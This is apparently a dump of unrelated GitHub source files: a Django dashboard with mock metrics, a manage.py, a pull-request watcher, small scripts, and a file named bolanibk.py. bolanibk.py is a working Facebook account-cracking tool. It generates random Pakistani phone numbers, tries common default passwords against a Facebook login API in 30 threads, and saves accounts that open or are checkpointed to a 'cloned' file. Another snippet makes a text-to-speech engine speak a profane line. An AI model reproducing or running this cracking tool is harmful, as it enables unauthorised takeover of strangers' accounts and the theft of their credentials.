outfile = outfile[:-3]+'pdf'
callList = ["pdfjoin", "--nup 3x2 ", "--outfile "+outfile]+fileList
command=''
for item in callList: command=command+' '+item
subprocess.call([command], shell=True)
|
[
"yoachim@uw.edu"
] |
yoachim@uw.edu
|
2aed29f99d592a8083b4e4cfa475decfbfc02a34
|
11227d2b6eb421f55006c543e3e0230ce2375250
|
/vsm_client/dashboard/views.py
|
7bdb0edd124345ebb1056313fbed607704186ec7
|
[] |
no_license
|
iansoft/vsm-client
|
ca5c5d46f1bbfc0aba1e4279f0323aee600270d5
|
45116c037c3366bcdfa33b02796cb8d435188b66
|
refs/heads/master
| 2021-01-10T10:12:31.605770
| 2016-04-26T00:27:23
| 2016-04-26T00:27:23
| 53,121,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,350
|
py
|
# _*_ coding: utf-8 _*_
from __future__ import division
import time,datetime
import json
import random
from django.shortcuts import render
from django.http import HttpResponse
from utils.menu import set_menu,set_breadcrumb
from utils.time import get_time_delta
from django.utils.translation import ugettext_lazy as _
def index(request):
menu_list = set_menu("Dashboard","")
function_item = {"name":"", "url":""}
breadcrumb_list = set_breadcrumb("Dashboard","",function_item)
return render(request, 'dashboard/index.html', {"menu_list":menu_list, "breadcrumb_list":breadcrumb_list})
def overview(request, module):
#the response data
data = {}
if module == "summary":
data = summary()
elif module == "disk_capacity":
data = disk_capacity()
elif module == "storage_group":
data = storage_group()
elif module == "pg":
data = pg()
elif module == "server":
pass
elif module == "osd":
data = osd()
elif module == "monitor":
data = monitor()
elif module == "mds":
data = mds()
elif module == "iops":
data = iops()
elif module == "lantency":
data = lantency()
elif module == "bandwidth":
data = bandwidth()
elif module == "cpu":
data = cpu()
return HttpResponse(json.dumps(data))
def summary():
return {
"vsm_version":"v3.0.0",
"ceph_version":"v10.0.4 ",
"install_time":"2015.09.01",
"uptime":now()
}
def disk_capacity():
total = 100;
used = random.randint(60,total)
percent = used / total;
return {
"total":"4G 500MB",
"used":"2G 500MB",
"percent":str(percent) + "%",
"uptime":now(),
"chart":[
{"name":"normal", "value":(total - used)},
{"name":"used", "value":used},
]
}
def storage_group():
percent_data = percent();
return {
"total":percent_data["total"],
"health":percent_data["health"],
"nearfull":percent_data["nearfull"],
"full":percent_data["full"],
"uptime":now(),
"chart":[
{"name":"health", "value":percent_data["health"]},
{"name":"nearfull", "value":percent_data["nearfull"]},
{"name":"full", "value":percent_data["full"]},
]
}
def pg():
total = 100;
active_clean = random.randint(60,total)
not_active_clean = total - active_clean
return {
"total":total,
"active_clean":active_clean,
"not_active_clean":not_active_clean,
"uptime":now(),
"chart":[
{"name":"active_clean", "value":active_clean},
{"name":"not_active_clean", "value":not_active_clean},
]
}
def osd():
total = 100
in_up = random.randint(0,total)
in_down = random.randint(0,(total-in_up))
out_up = random.randint(0,(total-in_up-in_down))
out_down = random.randint(0,(total-in_up-in_down-out_up))
percent_data = percent();
return {
"in_up":in_up,
"in_down":in_down,
"out_up":out_up,
"out_down":out_down,
"epoch":"2.2",
"uptime":now(),
"chart":[
{"name":"health", "value":percent_data["health"]},
{"name":"nearfull", "value":percent_data["nearfull"]},
{"name":"full", "value":percent_data["full"]},
]
}
def monitor():
return {
"probing":random.randint(0,100),
"electing":random.randint(0,100),
"synchronizing":random.randint(0,100),
"leader":random.randint(0,100),
"popen":random.randint(0,100),
"epoch":"2.2",
"uptime":now(),
}
def mds():
return {
"in":random.randint(0,100),
"up":random.randint(0,100),
"stopped":random.randint(0,100),
"failed":random.randint(0,100),
"total":random.randint(0,100),
"metadata":"2.2",
"data":"232.2",
"epoch":"422.2",
"uptime":now(),
}
def iops():
return {
"write":random.randint(0,100),
"read":random.randint(0,100),
"read_write":random.randint(0,100),
"uptime":now(),
}
def lantency():
return {
"write":random.randint(0,100),
"read":random.randint(0,100),
"read_write":random.randint(0,100),
"uptime":now()
}
def bandwidth():
return {
"in":random.randint(0,100),
"out":random.randint(0,100),
"uptime":now()
}
def cpu():
return {
"average":random.randint(0,100),
"max":random.randint(0,100),
"max_host":"192.168.1.%s" % (str(random.randint(1,255))),
"min":random.randint(0,100),
"min_host":"192.168.1.%s" % (str(random.randint(1,255))),
"uptime":now()
}
def percent():
total = 100;
health = random.randint(60,total)
nearfull = random.randint(0,(total-health))
full = total-health-nearfull
return {
"total":total,
"health":health,
"nearfull":nearfull,
"full":full
}
def now():
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
|
[
"anziloveanzi@hotmail.com"
] |
anziloveanzi@hotmail.com
|
32e3137189c26433965953a47f5319c110e53457
|
bf8f46d217a0a6e127e470e007ca1f5d54544d60
|
/bolanibk.py
|
ce7fc087be615c8de5121e30e1479c9e20c16735
|
[] |
no_license
|
balochmafia/bolanibk
|
b2050c1cc87c2d79c8b16addf09a6752a154d71e
|
a5b3345b959903c05e4bce0b52360a85819da185
|
refs/heads/main
| 2023-03-08T17:32:54.779311
| 2021-02-22T08:15:53
| 2021-02-22T08:15:53
| 341,125,927
| 0
| 1
| null | 2021-02-23T04:03:34
| 2021-02-22T08:15:03
|
Python
|
UTF-8
|
Python
| false
| false
| 25,523
|
py
|
# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('Then type: python2 boss')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Thanks.'
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;91m\x1b[1;92m░░▄███▄███▄
░░█████████
░░▒▀█████▀░
░░▒░░▀█▀
░░▒░░█░
░░▒░█
░░░█
░░█░░░░███████
░██░░░██▓▓███▓██▒
██░░░█▓▓▓▓▓▓▓█▓████
██░░██▓▓▓(◐)▓█▓█▓█
███▓▓▓█▓▓▓▓▓█▓█▓▓▓▓█
▀██▓▓█░██▓▓▓▓██▓▓▓▓▓█
░▀██▀░░█▓▓▓▓▓▓▓▓▓▓▓▓▓█
░░░░▒░░░█▓▓▓▓▓█▓▓▓▓▓▓█
░░░░▒░░░█▓▓▓▓█▓█▓▓▓▓▓█
░▒░░▒░░░█▓▓▓█▓▓▓█▓▓▓▓█
░▒░░▒░░░█▓▓▓█░░░█▓▓▓█
░▒░░▒░░██▓██░░░██▓▓██
████████████████████████
█▄─▄███─▄▄─█▄─█─▄█▄─▄▄─█
██─██▀█─██─██─█─███─▄█▀█
▀▄▄▄▄▄▀▄▄▄▄▀▀▄▄▄▀▀▄▄▄▄▄▀
\033[1;97m\x1b[1;96m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;91m\x1b[1;91mDEVOLPER zulfiqar Baloch
\033[1;94m\x1b[1;94mFACEBOOK Zulfiqar Baloch
\033[1;91m\x1b[1;95mWhatsap Number +923183700115
\x1b[1;94mBOLANI Baloch Zinda Baad
\x1b[1;93m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96m.\x1b[1;92mKING OF BOLANI.
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;92m-\x1b[1;94mKING OF BALOCHISTAN--------------------------------------
"""
####Logo####
logo1 = """
\033[1;91m\x1b[1;94m____________________██████
_________▓▓▓▓____█████████
__ Ƹ̵̡Ӝ̵̨̄Ʒ▓▓▓▓▓=▓____▓=▓▓▓▓▓
__ ▓▓▓_▓▓▓▓░●____●░░▓▓▓▓
_▓▓▓▓_▓▓▓▓▓░░__░░░░▓▓▓▓
_ ▓▓▓▓_▓▓▓▓░░♥__♥░░░▓▓▓
__ ▓▓▓___▓▓░░_____░░░▓▓
▓▓▓▓▓____▓░░_____░░▓
_ ▓▓____ ▒▓▒▓▒___ ████
_______ ▒▓▒▓▒▓▒_ ██████
_______▒▓▒▓▒▓▒ ████████
_____ ▒▓▒▓▒▓▒_██████ ███
_ ___▒▓▒▓▒▓▒__██████ _███
_▓▓X▓▓▓▓▓▓▓__██████_ ███
▓▓_██████▓▓__██████_ ███
▓_███████▓▓__██████_ ███
_████████▓▓__██████ _███
_████████▓▓__▓▓▓▓▓▓_▒▒
_████████▓▓__▓▓▓▓▓▓
_████████▓▓__▓▓▓▓▓▓
__████████▓___▓▓▓▓▓▓
_______▒▒▒▒▒____▓▓▓▓▓▓
_______▒▒▒▒▒ _____▓▓▓▓▓
________▒▒▒▒______▓▓▓▓▓
________█████____█████
_’▀█║────────────▄▄────────────▄──▄_
──█║───────▄─▄─█▄▄█║──────▄▄──█║─█║
──█║───▄▄──█║█║█║─▄║▄──▄║█║─█║█║▄█║
──█║──█║─█║█║█║─▀▀──█║─█║█║─█║─▀─▀
──█║▄║█║─█║─▀───────█║▄█║─▀▀
──▀▀▀──▀▀────────────▀─█║
───────▄▄─▄▄▀▀▄▀▀▄──▀▄▄▀
──────███████───▄▀
──────▀█████▀▀▄▀
────────▀█▀
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96m-\x1b[1;93mThe Credit For This Code Goes To BOLANI..
\033[1;97m
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
"""
logo2 = """
\033[1;91m\x1b[1;93m█▀▀▄ ▒█▀▀▀ ░█▀▀█ ▒█▀▀▄
▒█░▒█ ▒█▀▀▀ ▒█▄▄█ ▒█░▒█
▒█▄▄▀ ▒█▄▄▄ ▒█░▒█ ▒█▄▄▀
\033[1;97m••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••• ..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;94mFACEBOOK-\x1b[1;94mZulfiqar Baloch
\033[1;92mWHATAAPP \x1b[1;93m+923183700115
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96m -\x1b[1;92mking OF BOLANI Pakistan
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;97m----------------------\x1b[1;96mBalochistan Hackers Pakistan--------------------
"""
CorrectUsername = "BOLANI"
CorrectPassword = "GANG"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m\x1b[1;94mTool Username \x1b[1;92m»» \x1b[1;96m")
if (username == CorrectUsername):
password = raw_input("\033[1;97m \x1b[1;91mTool Password \x1b[1;97m» \x1b[1;97m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:love_hacker
time.sleep(2)
loop = 'false'
else:
print "\033[1;94mWrong Password"
os.system('xdg-open https://www.facebook.com/zulfiqar.baloch.9047506')
else:
print "\033[1;94mWrong Username"
os.system('xdg-open https://www.facebook.com/zulfiqar.baloch.9047506')
##### LICENSE #####
#=================#
def lisensi():
os.system('clear')
login()
####login#########
def login():
os.system('clear')
print logo1
print "\033[1;91m[1]\x1b[1;91mSTART ( \033[1;92m NOW)"
time.sleep(0.05)
print "\033[1;95m[2]\x1b[1;94mUPDATE (9.0)"
time.sleep(0.05)
print '\x1b[1;94m[0]\033[1;91m Exit ( Back)'
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;95mCHOOSE: \033[1;93m")
if peak =="":
print "\x1b[1;97mFill In Correctly"
pilih_login()
elif peak =="1":
Zeek()
def Zeek():
os.system('clear')
print logo1
print '\x1b[1;91m[1] START CLONING'
time.sleep(0.10)
print '\x1b[1;92m[2] Zulfiqar Baloch'
time.sleep(0.10)
print '\x1b[1;93m[3] BALOCH BADSHAH'
time.sleep(0.10)
print '\x1b[1;93m[4] BOLANI'
time.sleep(0.10)
print '\x1b[1;92m[5] CLONING ERROR'
time.sleep(0.10)
print '\x1b[1;91m[6] ZULFIQAR BALOCH FACEBOOK'
time.sleep(0.10)
print '\x1b[1;93m[0] back'
time.sleep(0.05)
action()
def action():
peak = raw_input('\n\033[1;97mCHOOSE:\033[1;97m')
if peak =='':
print '[!] Fill In Correctly'
action()
elif peak =="1":
os.system("clear")
print logo2
print "Enter any Pakistan Mobile code Number"+'\n'
print '\x1b[1;91mEnter any code 01 to 49'
print '\x1b[1;92mtelenor.\x1b[1;91mjazz.\x1b[1;93mzong.\x1b[1;95mwarid.UFUNE'
try:
c = raw_input("\033[1;97mCHOOSE : ")
k="03"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
blackmafiax()
elif peak =='0':
login()
else:
print '[!] Fill In Correctly'
action()
print 50* '\033[1;94m-'
xxx = str(len(id))
jalan ('\033[1;91m Total ids number: '+xxx)
jalan ('\033[1;92mCode you choose: '+c)
jalan ("\033[1;93mWait A While \x1b[1;94mStart Cracking...")
jalan ("\033[1;94mTo Stop Process Press Ctrl+z")
print 50* '\033[1;97m-'
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;95m(DON) ' + k + c + user + ' | ' + pass1
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(\x1b[1;95mBOLANIMAFIA24HORAS) ' + k + c + user + ' | ' + pass1
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = k + c + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m(OPEN) ' + k + c + user + ' | ' + pass2
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(\x1b[1;93mBOLANI CP) ' + k + c + user + ' | ' + pass2
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3="Pakistan123"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(ok) ' + k + c + user + ' | ' + pass3
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(\x1b[1;93mcp) ' + k + c + user + ' | ' + pass3
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4="00786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(ok) ' + k + c + user + ' | ' + pass4
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m\x1b[1;93m( chikpont) ' + k + c + user + ' | ' + pass4
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
else:
pass5="786786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(ok) ' + k + c + user + ' | ' + pass5
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass5+'\n')
okb.close()
oks.append(c+user+pass5)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m\x1b[1;94m(7deys) ' + k + c + user + ' | ' + pass5
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass5+'\n')
cps.close()
cpb.append(c+user+pass5)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50* '\033[1;91m-'
print 'Process Has Been Completed ...'
print 'Total Online/Offline : '+str(len(oks))+'/'+str(len(cpb))
print('Cloned Accounts Has Been Saved : save/cloned.txt')
jalan("Note : Your Offline account Will Open after 10 to 20 days")
print ''
print """
███
──────────███║║║║║║║███
─────────█║║║║║║║║║║║║║█
────────█║║║║███████║║║║█
───────█║║║║██─────██║║║║█
──────█║║║║██───────██║║║║█
─────█║║║║██─────────██║║║║█
─────█║║║██───────────██║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
────███████───────────███████
───██║║║║║║██────────██║║║║║██
──██║║║║║║║║██──────██║║║║║║║██
─██║║║║║║║║║║██───██║║║║║║║║║║██
██║║║║║║║║║║║║█████║║║║║║║║║║║║██
█║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║█
█║║║║║║║║║║║║║█████║║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
██║║║║║║║║║║║█░░░░░█║║║║║║║║║║║██
██║║║║║║║║║║║║█░░░█║║║║║║║║║║║║██
─██║║║║║║║║║║║█░░░█║║║║║║║║║║║██
──██║║║║║║║║║║█░░░█║║║║║║║║║║██
───██║║║║║║║║║█░░░█║║║║║║║║║██
────██║║║║║║║║█████║║║║║║║║██
─────██║║║║║║║║███║║║║║║║║██
──────██║║║║║║║║║║║║║║║║║██
───────██║║║║║║║║║║║║║║║██
────────██║║║║║║║║║║║║║██
─────────██║║║║║║║║║║║██
──────────██║║║║║║║║║██
───────────██║║║║║║║██
────────────██║║║║║██
─────────────██║║║██
──────────────██║██
───────────────███
───────────────────────▄██▄▄██▄
──────────────────────██████████
──────────────────────▀████████▀
────────────────────────▀████▀
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
──────────────────────▄▄▄████
──────────────────────▀▀▀████
──────────────────────▀▀▀████
──────────────────────▀▀▀████
──────────────────────▄█████▀
\033[1;96mThanks me later
\033[1;95mFb\033[1;97mBolani
\033[1;95m033[1;97m"""
raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
login()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
balochmafia.noreply@github.com
|
4b9309359ecad918d337ceb9d0e09b3cb68226d5
|
b1b29337bd65eba2f0b1c1e5c16768b4f27c67b5
|
/python/python.py
|
0698b88cf286ce89e68338f6010e12686e18ed57
|
[] |
no_license
|
mostofa22397/mostofa22397.github.io
|
e90737dd098e1677aeb4b38be96cd0b2eecc87c0
|
2d2feb052e0510b69ea63bf04679da9555f7d2a5
|
refs/heads/master
| 2022-12-12T04:36:40.390189
| 2020-08-16T03:53:12
| 2020-08-16T03:53:12
| 260,180,670
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 105
|
py
|
import pyttsx3
friend = pyttsx3.init()
friend.say('I can speak now. Fuck you bitch')
friend.runAndWait()
|
[
"mostofa22397@gamil.com"
] |
mostofa22397@gamil.com
|
5c3a89595dbc6632bc443fd0a07c473e032cf35b
|
05f4b73f8fab3a7b995bf2bd28b9f7eeba89d9e7
|
/1_20210120.py
|
a9e013731e61394a8b5abf764c7f5bfefd63f843
|
[] |
no_license
|
AlgorithmOnline/jaeeun
|
c7ee9504dd8109a8e0154e0ce514f35796ba368c
|
65dfee579d7a75bcc240a190e7edff10d285d113
|
refs/heads/master
| 2023-04-20T02:52:12.673218
| 2021-05-07T13:56:05
| 2021-05-07T13:56:05
| 286,736,284
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
#백준 실버5 1010
T = int(input())
ass=[1,1]
def fact(a):
if len(ass)-1<a:
for i in range(len(ass), a+1):
ass.append(ass[-1]*len(ass))
return ass[a]
for _ in range(T):
N, M = map(int, input().split())
print(round(fact(M)/(fact(M-N)*fact(N))))
|
[
"rha3122@naver.com"
] |
rha3122@naver.com
|
98b5c5eb7645a15cdc0458ffd989000b617d0303
|
babc797b560ff38c7cd5a8da25498e5461173e3f
|
/manage.py
|
53478feab5f3e2efc9de36bc9fe403f09b777dd6
|
[] |
no_license
|
vivalavida20/overwatch_patch_notes
|
cdbb3b8e13340b389702df6a87f1ab2dea7b3f24
|
c419eb917e3268b9a066df72d0d67a4952a739cd
|
refs/heads/master
| 2020-05-22T22:34:03.634271
| 2017-03-30T22:36:35
| 2017-03-30T22:36:35
| 84,730,828
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 809
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "patch_notes.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
[
"vivalavida2051@gmail.com"
] |
vivalavida2051@gmail.com
|
52b91de13800f3a0da47c3b25bba32f232274005
|
f9a577d4f522411c37c976197d5dcc3800904dc5
|
/cryptobot/currency/__init__.py
|
dddab8c6ac239a986f759704dc5bfef6403b2047
|
[] |
no_license
|
Ferdellans/arbitrage
|
e223ae0ff50c58d21cf741c9332ba00ba2196271
|
115ca544ed61eecbc7442405e22bdd33be0bf931
|
refs/heads/master
| 2022-12-15T13:14:14.335480
| 2018-05-10T07:36:11
| 2018-05-10T07:36:11
| 132,863,902
| 1
| 0
| null | 2022-12-08T00:43:54
| 2018-05-10T07:22:17
|
Python
|
UTF-8
|
Python
| false
| false
| 250
|
py
|
from cryptobot.common.manager import BaseManager
class BaseCurrency:
@property
def title(self):
raise NotImplemented
symbol = title
class CurrencyManager(BaseManager):
CACHE = {}
import_mask = "cryptobot.currency.{}"
|
[
"yevhenii.luchaninov@gmail.com"
] |
yevhenii.luchaninov@gmail.com
|
6be792eac7e706782893db069264bc9eac560886
|
e09c1040c8a96567966984bc1a4e04cd9e39bf0c
|
/watcher.py
|
2f313f2612ba6a9ba47f3a2ab08967e3670b1016
|
[] |
no_license
|
ee08b397/github-watcher
|
910b736076085536e97eb08073be18a5466c60c7
|
e688f30b64de96a07ea2bb268122d71b5c553184
|
refs/heads/master
| 2021-07-23T17:01:48.987193
| 2017-11-03T23:00:42
| 2017-11-03T23:00:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,855
|
py
|
import json
import subprocess
import os.path
import time
import sys
import unidiff
import requests
from pync import Notifier
import yaml
GITHUB_API = 'https://api.github.com'
WATCHER_ALERT_LOG = '/tmp/watcher_alert.log'
try:
with open(os.path.join(os.path.expanduser('~'), '.github'), 'rb') as github_auth_fp:
oauth_token = github_auth_fp.read().strip()
except IOError as e:
print "You must store your github access token at ~/.github."
print " 1. Go to github.braintreeps.com and"
print " 2. click your avatar in the top right then"
print " 3. click Settings then"
print " 4. click Personal access tokens on the left then"
print " 5. Generate access token then"
print " 6. click repo and user permissions checkboxes. next"
print " 7. click Generate Token. "
print " 8. SAVE THAT. copy/paste to ~/.github you will never see it again."
sys.exit(1)
try:
with open(os.path.join(os.path.expanduser('~'), '.watch-github.yml'), 'rb') as config:
CONFIG = yaml.load(config.read())
except IOError as e:
print "You must include a configuration of what to watch at ~/.watch-github.yml"
sys.exit(1)
headers = {'Authorization': 'token {}'.format(oauth_token)}
def get_open_pull_requests(user, repo):
resource = GITHUB_API + '/repos/{user}/{repo}/pulls?state=open'.format(
**{'user': user, 'repo': repo})
return requests.get(resource, headers=headers).json()
def get_diff(pull_request):
diff_url = pull_request.get('diff_url')
return requests.get(diff_url, headers=headers).text
def get_watched_file(user, repo, hunk_path):
paths = CONFIG.get(user, {}).get(repo, [])
if not paths:
return None
for path in paths:
if hunk_path == path:
return path
return None
def get_watched_directory(user, repo, hunk_path):
paths = CONFIG.get(user, {}).get(repo, [])
if not paths:
return None
for path in paths:
if hunk_path.startswith(path):
return path
return None
def alert(user, repo, file, range, pr_link):
msg = 'Found a PR effecting {file} {range}'.format(
file=file,
range=str(range))
subprocess.call('say ' + msg, shell=True)
Notifier.notify(
msg,
title='Github Watcher',
open=pr_link)
sys.stdout.write('\a')
sys.stdout.flush()
def are_watched_lines(watchpaths, filepath, start, end):
if filepath not in watchpaths:
return False
for watched_start, watched_end in watchpaths[filepath]:
if watched_start < start < watched_end:
return True
if watched_start < end < watched_end:
return True
return False
def alert_if_watched_changes(user, repo, patched_file, link, source_or_target='source'):
filepath = getattr(patched_file, source_or_target + '_file')
if filepath.startswith('a/') or filepath.startswith('b/'):
filepath = filepath[2:]
watched_directory = get_watched_directory(user, repo, filepath)
if watched_directory and not already_alerted(link):
alert(user, repo, watched_directory, '', link)
mark_as_alerted(link)
return True
watched_file = get_watched_file(user, repo, filepath)
if watched_file:
for hunk in patched_file:
start = getattr(hunk, source_or_target + '_start')
offset = getattr(hunk, source_or_target + '_length')
end = start + offset
if are_watched_lines(watchpaths, filepath, start, end):
if not already_alerted(link):
alert(user, repo, watched_file, (start, end), link)
mark_as_alerted(link)
return True
return False
def mark_as_alerted(pr_link):
with open(WATCHER_ALERT_LOG, 'a+') as fp:
fp.write(pr_link + '\n')
def already_alerted(pr_link):
try:
with open(WATCHER_ALERT_LOG, 'rb') as fp:
alerted = fp.readlines()
for line in alerted:
if pr_link in line:
return True
except IOError as e:
pass
return False
if __name__ == '__main__':
while True:
for user, repo_watchpaths in CONFIG.items():
for repo, watchpaths in repo_watchpaths.items():
open_prs = get_open_pull_requests(user, repo)
for open_pr in open_prs:
link = open_pr.get('_links', {}).get('html', {}).get('href', '')
patchset = unidiff.PatchSet.from_string(get_diff(open_pr))
for patched_file in patchset:
if alert_if_watched_changes(user, repo, patched_file, link, 'source'):
continue
alert_if_watched_changes(user, repo, patched_file, link, 'target')
time.sleep(60 * 10) # 10 minutes
|
[
"andrew.kelleher@venmo.com"
] |
andrew.kelleher@venmo.com
|
86014a65c1da280a31e3d5726715e8c400fe29ea
|
1d2422c7187468157d0582351a83bf598b99a47e
|
/OOblogger.py
|
07cd3f62173947210309f797c91d03770b681a45
|
[] |
no_license
|
tcc/clippings
|
0571cceaff79f96113cb2c051c00d67f80d44d9b
|
148dffe399102d59a94c1b2844eebc9d88a59ada
|
refs/heads/master
| 2021-01-10T20:44:28.810980
| 2011-12-10T16:09:35
| 2011-12-10T16:09:35
| 176,566
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 29,283
|
py
|
# -*- coding: UTF-8 -*-
#
# Copyright 2009 T.C. Chou, All rights reserved.
#
